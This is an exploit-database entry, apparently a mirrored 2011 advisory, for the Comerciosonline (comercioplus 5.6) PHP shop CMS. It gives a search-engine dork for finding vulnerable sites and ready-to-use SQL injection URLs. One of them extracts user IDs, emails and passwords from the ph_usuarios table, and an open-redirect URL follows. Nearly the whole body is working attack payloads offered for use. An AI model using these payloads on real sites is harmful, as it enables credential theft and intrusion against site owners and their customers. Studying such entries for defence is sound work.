[] NeoSense
E X P L O I T S
title author type platform port cve id

comercioplus 5.6 - Multiple Vulnerabilities

Author: Daniel Godoy
type: webapps
platform: php
port: 
date_added: 2011-01-27 
date_updated: 2011-01-27 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
 # Exploit Title: Comerciosonline CMS SQLi
# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "
# Date: 27/01/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.comerciosonline.com/index.php?p=8
# Version: All
# Tested on: Linux, Windows

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex



[POC]
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--

http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--

[SQL Injection]
http://localhost/b2c/index.php?page=pp_productos.php&tbusq=9&codf=17&md=1&codm=-1+UNION+SELECT+1,2--

[URL Redirect]
http://localhost/b2c/anuncioredir.php?id=14&tipobanner=2&redir=http://www.google.com.ar
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.